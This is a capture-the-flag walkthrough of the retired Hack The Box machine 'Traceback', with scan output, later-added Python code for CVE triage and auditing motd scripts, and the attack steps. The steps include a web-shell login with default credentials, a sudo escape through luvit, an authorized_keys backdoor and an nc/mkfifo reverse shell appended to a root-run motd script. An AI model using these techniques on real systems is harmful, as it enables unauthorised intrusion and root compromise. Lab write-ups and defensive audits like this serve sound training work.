
[SEC-CTF] Hack The Box [M] Traceback (retired)

Specifications

Meta            OS      Network         From          To             Creator(s)
Traceback       Linux   10.10.10.181    14 Mar 2020   ~29 Aug 2020   Xh4H
Easy / 20 pts           traceback.htb

Basic Enumeration

sudo nmap -sS -sV --script=default,vuln -p- -T5 traceback.htb

Nmap scan report for traceback.htb (10.10.10.181)
Host is up (0.13s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| ssh-hostkey:
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-title: Help us
| vulners:
|   cpe:/a:apache:http_server:2.4.29:
|     	CVE-2019-0211	7.2	https://vulners.com/cve/CVE-2019-0211
|     	CVE-2018-1312	6.8	https://vulners.com/cve/CVE-2018-1312
|     	CVE-2017-15715	6.8	https://vulners.com/cve/CVE-2017-15715
|     	CVE-2019-10082	6.4	https://vulners.com/cve/CVE-2019-10082
|     	CVE-2019-0217	6.0	https://vulners.com/cve/CVE-2019-0217
|     	CVE-2020-1927	5.8	https://vulners.com/cve/CVE-2020-1927
|     	CVE-2019-10098	5.8	https://vulners.com/cve/CVE-2019-10098
|     	CVE-2020-1934	5.0	https://vulners.com/cve/CVE-2020-1934
|     	CVE-2019-10081	5.0	https://vulners.com/cve/CVE-2019-10081
|     	CVE-2019-0220	5.0	https://vulners.com/cve/CVE-2019-0220
|     	CVE-2019-0196	5.0	https://vulners.com/cve/CVE-2019-0196
|     	CVE-2018-17199	5.0	https://vulners.com/cve/CVE-2018-17199
|     	CVE-2018-1333	5.0	https://vulners.com/cve/CVE-2018-1333
|     	CVE-2017-15710	5.0	https://vulners.com/cve/CVE-2017-15710
|     	CVE-2019-0197	4.9	https://vulners.com/cve/CVE-2019-0197
|     	CVE-2019-10092	4.3	https://vulners.com/cve/CVE-2019-10092
|     	CVE-2018-11763	4.3	https://vulners.com/cve/CVE-2018-11763
|_    	CVE-2018-1283	3.5	https://vulners.com/cve/CVE-2018-1283
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 172.37 seconds
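The vulners script prints one CVE per line with a CVSS score, which is easier to triage once it is structured. The following is an added example, not part of the original writeup, that parses that section into a list sorted by score and filters it against a threshold; the excerpt it parses is constructed from the output above, and the 7.0 cut-off is an assumption, not anything the page states.

```python
import re
from dataclasses import dataclass

# Constructed excerpt of the vulners block from the nmap output above (tabs
# between the columns, as nmap prints them); not a live scan.
NMAP_EXCERPT = """\
|   cpe:/a:apache:http_server:2.4.29:
|     \tCVE-2019-0211\t7.2\thttps://vulners.com/cve/CVE-2019-0211
|     \tCVE-2018-1312\t6.8\thttps://vulners.com/cve/CVE-2018-1312
|     \tCVE-2019-10082\t6.4\thttps://vulners.com/cve/CVE-2019-10082
|_    \tCVE-2018-1283\t3.5\thttps://vulners.com/cve/CVE-2018-1283
"""


@dataclass(frozen=True)
class Finding:
    cpe: str
    cve: str
    score: float
    url: str


# A CPE header line: "|   cpe:/a:apache:http_server:2.4.29:"
CPE_RE = re.compile(r"^\|_?\s+(cpe:/\S+?):?\s*$")
# A finding line: "|     <tab>CVE-YYYY-NNNN<tab>score<tab>url"
CVE_RE = re.compile(r"^\|_?\s+(CVE-\d{4}-\d{4,})\s+(\d+(?:\.\d+)?)\s+(\S+)\s*$")


def parse_vulners(text):
    """Parse vulners output into Finding objects, highest score first."""
    findings = []
    cpe = None
    for line in text.splitlines():
        m = CPE_RE.match(line)
        if m:
            cpe = m.group(1)  # findings that follow belong to this product
            continue
        m = CVE_RE.match(line)
        if m and cpe:
            findings.append(Finding(cpe, m.group(1), float(m.group(2)), m.group(3)))
    return sorted(findings, key=lambda f: (-f.score, f.cve))


def triage(findings, threshold=7.0):
    """Keep only findings at or above the CVSS threshold (assumed cut-off)."""
    return [f for f in findings if f.score >= threshold]


if __name__ == "__main__":
    for f in triage(parse_vulners(NMAP_EXCERPT)):
        print(f"{f.score:>4}  {f.cve}  {f.cpe}  {f.url}")
```

Scores from vulners are version-based, so a high-scoring entry only means the banner version is in the affected range; confirming that the build is actually vulnerable (distribution backports included) is a separate step.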

nikto -h traceback.htb

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.181
+ Target Hostname:    traceback.htb
+ Target Port:        80
+ Start Time:         2020-05-28 01:51:51 (GMT-3)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 459, size: 5911796d5b788, mtime: gzip
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7786 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2020-05-28 02:12:20 (GMT-3) (1229 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

sudo docker run --network="host" -v $(pwd):/app/code -w /app/code -it --rm dirsearch:v0.3.8 -u traceback.htb -E -r -t 100 -f -w web-shells.common.txt

http://traceback.htb/icons/
http://traceback.htb/icons/README
http://traceback.htb/index.html
http://traceback.htb/server-status
http://traceback.htb/smevk.php

Attack Steps

Foothold


User: sysadmin

  • Flag: /home/sysadmin/user.txt
  1. Log in to the web shell (smevk.php) with admin / admin.
  2. Run nc -l -p 9090 -vvv and have smevk.php connect back to it.
  3. You now have a reverse shell.
  4. Check the sudo rules: sudo -l
  5. Exploit with this: sudo -u sysadmin /home/sysadmin/luvit -e 'os.execute("/bin/sh")'
  • Trick:

Add your public key to authorized_keys and log in with ssh:

echo "ssh-rsa YOUR_HASH YOUR_USER@YOUR_HOST" >> /home/sysadmin/.ssh/authorized_keys
ssh sysadmin@traceback.htb

Own: root

  • Flag: /root/root.txt
  1. Watch the process list: watch 'ps aux | tail -n 15'
  2. Note this command in the process list (executed by root):

    /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/

  3. Append a reverse shell to the motd script (it runs when you log in over ssh):

    mkdir /dev/shm/.rios0rios0
    echo "mkfifo /dev/shm/.rios0rios0/pipe; nc -nv 10.10.14.56 9091 < /dev/shm/.rios0rios0/pipe | /bin/sh 2>/dev/shm/.rios0rios0/pipe >/dev/shm/.rios0rios0/pipe" >> /etc/update-motd.d/00-header

  4. Exploit with this: ssh sysadmin@traceback.htb (you have about 30 s before the cron job overwrites the script)
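From the defender's side, the weakness in this last step is not the cron job but the fact that a lower-privileged user can modify scripts that root later runs; restoring them from /var/backups every 30 seconds only narrows the window. The following is an added example, not part of the original writeup, of an audit that flags such scripts: files writable by group or other, files not owned by the trusted uid, reverse-shell indicators in the content, and drift from a baseline copy. The directory layout, the fixture contents and the 203.0.113.5 address are constructed for the demo.

```python
import hashlib
import os
import re
import stat
import tempfile
from pathlib import Path

# Indicators that a login script has been turned into a callback. Constructed
# list; extend it with whatever your own detection content covers.
SUSPICIOUS = re.compile(r"mkfifo|\bnc\b|\bncat\b|/dev/tcp/|bash -i", re.IGNORECASE)


def file_sha256(path):
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()


def audit_motd_dir(motd_dir, backup_dir=None, trusted_uid=0):
    """Return (filename, issue) pairs for the scripts in motd_dir.

    pam_motd runs these scripts as root at every login, so any file here
    that a non-root user can write is a root-level finding regardless of
    what it currently contains.
    """
    issues = []
    for path in sorted(Path(motd_dir).iterdir()):
        if not path.is_file():
            continue
        st = path.stat()
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            issues.append((path.name, "writable by group/other"))
        if st.st_uid != trusted_uid:
            issues.append((path.name, f"owned by uid {st.st_uid}, not {trusted_uid}"))
        if SUSPICIOUS.search(path.read_text(errors="replace")):
            issues.append((path.name, "contains reverse-shell indicator"))
        if backup_dir is not None:
            ref = Path(backup_dir) / path.name
            if not ref.is_file():
                issues.append((path.name, "no baseline copy"))
            elif file_sha256(ref) != file_sha256(path):
                issues.append((path.name, "differs from baseline"))
    return issues


def build_fixture():
    """Constructed fixture: a clean baseline directory and a live directory
    where one script was made group-writable and had a callback appended."""
    root = Path(tempfile.mkdtemp())
    live, backup = root / "update-motd.d", root / "backup"
    live.mkdir()
    backup.mkdir()
    header = "#!/bin/sh\nprintf 'Welcome\\n'\n"
    uname = "#!/bin/sh\nuname -a\n"
    (backup / "00-header").write_text(header)
    (backup / "10-uname").write_text(uname)
    # 203.0.113.5 is a documentation address; the line is only an indicator.
    (live / "00-header").write_text(header + "nc -nv 203.0.113.5 9091\n")
    (live / "10-uname").write_text(uname)
    os.chmod(live / "00-header", 0o775)
    os.chmod(live / "10-uname", 0o755)
    return live, backup


def run_demo():
    """Audit the fixture, trusting the current user as the legitimate owner."""
    live, backup = build_fixture()
    return audit_motd_dir(live, backup, trusted_uid=os.getuid())


if __name__ == "__main__":
    for name, issue in run_demo():
        print(f"{name}: {issue}")
```

On a real host you would run audit_motd_dir("/etc/update-motd.d", "/var/backups/.update-motd.d") as root, and the fix for any permission finding is chown root:root plus mode 0755, not a faster restore loop.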
This post is licensed under CC BY 4.0 by the author.
